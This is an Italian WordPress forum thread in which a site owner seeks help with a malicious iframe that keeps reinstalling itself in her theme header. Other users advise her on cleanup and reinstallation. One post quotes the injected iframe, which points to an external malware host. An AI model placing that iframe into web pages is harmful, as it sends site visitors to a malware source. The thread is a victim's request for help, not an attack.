Home › Forum › Problemi Vari con WP › Codice I-frame che si auto-istalla nell'header
-
AutorePost
-
-
14 Gennaio 2012 alle 23:11 #20339Isa-b-69Partecipante
Salve,
da qualche tempo e da quando ho aggiornato il plugin di Askimet nel mio sito http://www.gossippanto.it nell’header del tema in uso (suffusion) si ‘auto-istalla’ un codice i-frame che fa aprire un plugin o da avviso di virus nella home page.
Ho già cancellato svariate volte tale codice-script che si inserisce ogni volta in questa posizione:
<?php suffusion_before_page(); ?>
<?php
suffusion_before_begin_wrapper();
?>
<div id=”wrapper” class=”fix”>
<?php
suffusion_after_begin_wrapper();
?>
Pensavo di aver risolto il problema ma puntualmente mi si ri-istalla per magia. Sono andata alla ricerca dell’origine di tale problema spulciando tutti i file modificati nelle varie cartelle nel mio ftp, ma l’unico che si modifica è proprio quello della testata del tema.
Non capisco perchè e come ciò accada.
Spero di essermi spiegata e che possiate aiutarmi!
Grazie
Isabella ^__^
-
15 Gennaio 2012 alle 11:04 #91823EmmePartecipante
Akismet non c’entra nulla. Fossi in te farei un backup dei contenuti (mi raccomando: con il metodo di esportazione xml, non con backup di tutto il database) e delle immagini. Cancellerei e reinstallerei WordPress, modificherei la password FTP. Rimetterei il tema che voglio (assicurandomi di prelevarlo dal sito ufficiale) e reinstallerei uno ad uno tutti i plugin dopo aver verificato in rete che non siano pericolosi in alcun modo. E’ un metodo drastico, lo so, ma in questo modo vai sul sicuro.
-
16 Gennaio 2012 alle 16:36 #91882Isa-b-69Partecipante
grazie unica ‘anima pia’ che mi ha risposto….Vero è un metodo drastico…speravo di trovare qualcuno altro che avesse avuto stesso problema…e che continua a riproporsi..come qualche minuto fa..
Ho cancellato ancora stringa comparsa per magia nell’header e che segnalava virus appena si apriva pagina..Dovro’ fare come mi consigli tu….Grazie.. ma mi sorge il dubbio che dipenda da tema (preso dal sito di WP dei tempi) e che derivi da qualche modifica fatta da me e che magari nel codice riesce ad entrare solo il creatore di Suffusione *___* non so che pensare
-
16 Gennaio 2012 alle 17:03 #91885TittiModeratore
Se sospetti che sia il tema prova per qualche giorno a usare il tema standard di WP e vedi se ricapita. Magari disattivi anche i plugin (ma non è certo Akismet il colpevole, a meno che non sia stato manomesso), riattivandoli uno ad uno se il codice non appare.
Soffusion è comunque uno dei temi più usati e aggiornati (e tu hai l’ultima versione vero?), e certamente è un tema che si può modificare (e che modifiche hai fatto?)
Sarebbe utile sapere però se stiamo parlando dello stesso tema, quindi magari indicaci da dove l’hai scaricato, perché “preso dal sito di WP dei tempi” non è chiaro. Ho provato il tuo sito ma al momento non si carica.
-
20 Gennaio 2012 alle 21:31 #92157Isa-b-69Partecipante
( di male in peggio…aspettavo di fare un ripristino di tutto il mio sito in questo w.e. ma il maledetto codice ha infestato altro e Google mi rileva malware e bloccato sito …riportando oltre ad alcuni post anche queste directory dove si è inserito sempre que maledetto codice iframe:
/ – Dettagli 20/01/12
/2011/ – Dettagli 20/01/12
/2012/ – Dettagli 20/01/12
/2011/01/ – Dettagli 20/01/12
/2012/01/ – Dettagli 20/01/12
/page/14/ – Dettagli 20/01/12
Sinceramente sono senza parole..Una domanda da ignorante ma non è che il codice si è inserito anche nel database…??PLEASE AIUTATEMI..intanto sto facendo backup del database ma in formato SQL..e delle immagini e ristallerò tutto…. Riuscirò a risolvere?? (
-
20 Gennaio 2012 alle 21:37 #92159Dudy_wpPartecipante
ciao Isa, non disperare
basta che inserisci il seguente codice
remove_action('suffusion_before_begin_wrapper', 'suffusion_display_open_header');
remove_action('suffusion_after_begin_wrapper', 'suffusion_display_closed_header');
remove_action('suffusion_page_header', 'suffusion_display_header');
remove_action('suffusion_page_header', 'suffusion_display_main_navigation');nel file headless-template.php del tuo tema, prima del codice get_header() e tutto si risolve magicamente
-
20 Gennaio 2012 alle 21:43 #92161Isa-b-69Partecipante
Dudy grazie….ma senza rimuovere e ristallare tutto?? o dopo aver ristallato wp e database ex novo??
( ma io nel mio tema non ho headless-template.php helppppppppp??
-
20 Gennaio 2012 alle 21:44 #92162Dudy_wpPartecipante
senza rimuovere e reinstallare tutto
-
20 Gennaio 2012 alle 21:46 #92163Isa-b-69Partecipante
senza rimuovere e reinstallare tutto
e magari ma nel mio tema non c’è file headless-template.php
-
20 Gennaio 2012 alle 21:47 #92164Dudy_wpPartecipante
allora header.php
-
20 Gennaio 2012 alle 21:51 #92165Isa-b-69Partecipante
immaginavo ma io get_header() c’è l’ho all’inizio..scusami ma ti incollo il codice forse mi sai dire meglio, io sono andata nel pallone (
<?php
/**
* Core header file, invoked by the get_header() function
*
* @package Suffusion
* @subpackage Templates
*/
global $suffusion_unified_options, $suffusion_interactive_text_fields, $suffusion_translatable_fields, $suffusion_skin_dependence;
if (function_exists(‘icl_t’)) {
foreach ($suffusion_unified_options as $id => $value) {
/**
* Some strings are set interactively in the admin screens of Suffusion. If you have WPML installed, then there may be translations of such strings.
* This code ensures that such translations are picked up, then the unified options array is rewritten so that subsequent calls can pick it up.
*/
if (function_exists(‘icl_t’) && in_array($id, $suffusion_translatable_fields) && isset($suffusion_interactive_text_fields[$id])) {
$value = wpml_t(‘suffusion-interactive’, $suffusion_interactive_text_fields[$id].”|”.$id, $value);
}
global $$id;
$$id = $value;
$suffusion_unified_options[$id] = $value;
}
}
?>
<!DOCTYPE html PUBLIC “-//W3C//DTD XHTML 1.0 Transitional//EN” “http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd”>
<html xmlns=”http://www.w3.org/1999/xhtml” <?php language_attributes(); ?>>
<head profile=”http://gmpg.org/xfn/11″>
<meta http-equiv=”Content-Type” content=”<?php bloginfo(‘html_type’); ?>; charset=<?php bloginfo(‘charset’); ?>” />
<link rel=”pingback” href=”<?php bloginfo(‘pingback_url’); ?>” />
<?php
suffusion_document_header();
$suffusion_pseudo_template = suffusion_get_pseudo_template_class();
if (is_singular()) {
wp_enqueue_script(‘comment-reply’);
}
$skin = isset($suf_color_scheme) ? $suf_color_scheme : ‘light-theme-gray-1’;
$extra_classes = $suffusion_pseudo_template;
if (isset($suffusion_skin_dependence[$skin])) {
$extra_classes = array_merge($extra_classes, $suffusion_skin_dependence[$skin]);
}
$extra_classes[] = $skin;
wp_head();
?>
</head>
<body <?php body_class($extra_classes); ?>>
<?php suffusion_before_page(); ?>
<?php
suffusion_before_begin_wrapper();
?>
<div id=”wrapper” class=”fix”>
<?php
suffusion_after_begin_wrapper();
?>
<div id=”container” class=”fix”>
<?php
suffusion_after_begin_container();
?>
-
20 Gennaio 2012 alle 21:54 #92166Dudy_wpPartecipante
prova a metterlo li, sopra wp_head();
-
20 Gennaio 2012 alle 21:55 #92167Isa-b-69Partecipante
grazie provo…..sei stato gentilissimo…ultima domanda?? ma come mai è successo questo?
-
20 Gennaio 2012 alle 22:03 #92168Dudy_wpPartecipante
risolto?
-
20 Gennaio 2012 alle 22:10 #92169Isa-b-69Partecipante
l’ho inserito ma Chrome mi blocca sempre sito ..visto che mi segnalava quel maleware nelle directory succitate…
Che faccio RICHIEDO CONTROLLO E DICHIARO CHE HO L’HO TOLTO?? mmmmmmm
-
20 Gennaio 2012 alle 22:12 #92170Dudy_wpPartecipante
scusa ma esattamente qual’è il codice che ti si rimette ogni volta che lo elimini? altra domanda… quella chat da quanto tempo l’hai messa?
-
20 Gennaio 2012 alle 22:14 #92171Isa-b-69Partecipante
no ma quella è una pagina temporanea e l’ho messa solo da qualche ora e da quando c’era problema ovvero da un paio d’ore….il codice è questo:
<iframe src=”http://pre72hdskot.biz?tp=89c9473171a1c848″>
-
20 Gennaio 2012 alle 22:23 #92172Dudy_wpPartecipante
Allora scusami ma avevo capito male io, elimina il codice che ti ho detto prima. Per darti una mano dovrei accedere al tuo ftp perché va controllato ogni file uno per uno per capire dove si annida il malware che reintroduce ogni volta il codice nei file. Se vuoi posso farlo, tanto una volta risolto il problema cambiare la password dell’ftp è d’obbligo
-
20 Gennaio 2012 alle 22:37 #92173Isa-b-69Partecipante
azz ( ma cancellando tutti i file wp tranne le immagini….non risolvo?? se ristallo tutto di nuovo??
-
20 Gennaio 2012 alle 22:44 #92174Dudy_wpPartecipante
Si ma potrebbe non essere duratura la cosa. Comunque prova, cancella wp e tutto tranne le immagini, reinstalla tutto, cambia la password dell’ftp e vedi come vanno le cose, se per una settimana non vedi più il codice allora avvisa google che è eliminato.
-
20 Gennaio 2012 alle 22:49 #92175Isa-b-69Partecipante
caspita per una settimana devo essere bloccata da Google?? un danno immane visto che ogni giorno ho circa 5000-8000 visite ( ma come caspita hanno fatto…a infestarmi sito??
Comunque sei stato gentilissimo..posso disturbarti ancora se sarò ancora disperata?? grazieeeeeeeeeeeeeeeee
-
20 Gennaio 2012 alle 22:54 #92176Dudy_wpPartecipante
Certo quando vuoi se non mi trovi qui basta che clicchi sul mio nome e arrivi sul mio sito dove trovi il modulo per contattarmi
-
21 Gennaio 2012 alle 10:42 #92190San PietroburgoPartecipante
Quando un sito è compromesso si devono innanzi tutto sostituire i dati di login della connessione FTP. Poi si cancella tutto, tranne i file .htaccess, wp-config.php e la cartella al percorso wp-content/uploads ed altre folder sotto wp-content come gallery ecc. (questo dipende da quali plugin utilizzano specifiche directory). Anche il tema in uso andrebbe rasato via, come tutti i plugin, per rimetterli nuovamente prelevandoli dal repository ufficiale di wordpress.org.
Ma alle volte anche questo sistema potrebbe non risolvere, questo capita quando ad essere stato compromesso è anche il database.
In questo caso si interviene installando WordPress in locale ed utilizzando le funzioni “esporta” del sito ed “importa” del wp in locale.
In questa maniera anche il database verrà generato nuovo e pulito. Poi da “locale” bisognerà spostare nel server tutto il sito e sostituire il vecchio database.
p.s.
Su aruba capita abbastanza frequente che un utente del server riesca ad entrare nelle installazioni dei “vicini” ed infettarle. Sarebbe meglio adottare accorgimenti a livello del file .htaccess per non permettere questo tipo di accessi non autorizzati. Oppure, quando un sito ha molte visite ed i costi sono ammortizzati dagli introiti pubblicitari, meglio spostarsi in un Vps od un dedicato.
-
21 Gennaio 2012 alle 14:49 #92240Isa-b-69Partecipante
grazie anche a te SP io però ho fatto il contrario…azz…ovvero cancellato e ristallato tutto e ora cambio pass….*__* Speriamo bene…riguardo Aruba sto valutando di cambiarlo ma i miei introiti pubblicitari non sono cosଠelevati per farlo…Il mio è un sito che va benino ma non a scopi di lucro..vedremo…
Cosa mi consigli di aggiungere per proteggere in .htaccess??
-
-
AutorePost
- Devi essere connesso per rispondere a questo topic.